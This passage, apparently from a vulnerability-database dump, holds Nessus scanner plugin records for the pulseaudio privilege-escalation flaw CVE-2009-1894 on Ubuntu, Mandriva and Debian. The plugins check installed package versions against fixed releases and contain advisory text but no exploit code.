pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio\", 
pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.14-0ubuntu20.2\")) 
flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio\", pkgver:\"1:0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", 
pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpulse-browse0 / libpulse-browse0-dbg / libpulse-dev / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:43", "description": "A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that pulseaudio, when installed setuid root, does not drop privileges before re-executing itself to achieve immediate bindings. This can be exploited by a user who has write access to any directory on the file system containing /usr/bin to gain local root access. 
The user needs to exploit a race condition related to creating a hard link (CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64pulseaudio-devel", "p-cpe:/a:mandriva:linux:lib64pulseaudio0", "p-cpe:/a:mandriva:linux:lib64pulsecore5", "p-cpe:/a:mandriva:linux:lib64pulseglib20", "p-cpe:/a:mandriva:linux:lib64pulsezeroconf0", "p-cpe:/a:mandriva:linux:libpulseaudio-devel", "p-cpe:/a:mandriva:linux:libpulseaudio0", "p-cpe:/a:mandriva:linux:libpulsecore5", "p-cpe:/a:mandriva:linux:libpulseglib20", "p-cpe:/a:mandriva:linux:libpulsezeroconf0", "p-cpe:/a:mandriva:linux:pulseaudio", "p-cpe:/a:mandriva:linux:pulseaudio-esound-compat", "p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth", "p-cpe:/a:mandriva:linux:pulseaudio-module-gconf", "p-cpe:/a:mandriva:linux:pulseaudio-module-jack", "p-cpe:/a:mandriva:linux:pulseaudio-module-lirc", "p-cpe:/a:mandriva:linux:pulseaudio-module-x11", "p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf", "p-cpe:/a:mandriva:linux:pulseaudio-utils", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2009.1"], "id": "MANDRIVA_MDVSA-2009-152.NASL", "href": "https://www.tenable.com/plugins/nessus/39871", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:152. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39871);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"MDVSA\", value:\"2009:152\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can be\nexploited by a user who has write access to any directory on the file\nsystem containing /usr/bin to gain local root access. 
The user needs\nto exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif 
(rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-esound-compat-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-bluetooth-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-gconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-jack-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-lirc-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-x11-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-zeroconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-utils-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-esound-compat-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-bluetooth-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-gconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-jack-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-lirc-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-x11-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-zeroconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-utils-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-esound-compat-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-bluetooth-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-gconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-jack-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-lirc-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-x11-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-zeroconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-utils-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:08", "description": "Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges.", "cvss3": {}, "published": "2010-02-24T00:00:00", "type": "nessus", "title": "Debian DSA-1838-1 : pulseaudio - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:pulseaudio", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1838.NASL", "href": "https://www.tenable.com/plugins/nessus/44703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1838. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44703);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"DSA\", value:\"1838\");\n\n script_name(english:\"Debian DSA-1838-1 : pulseaudio - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pulseaudio packages.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pulseaudio\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-dev\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio\", reference:\"0.9.10-3+lenny1\")) 
flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf\", 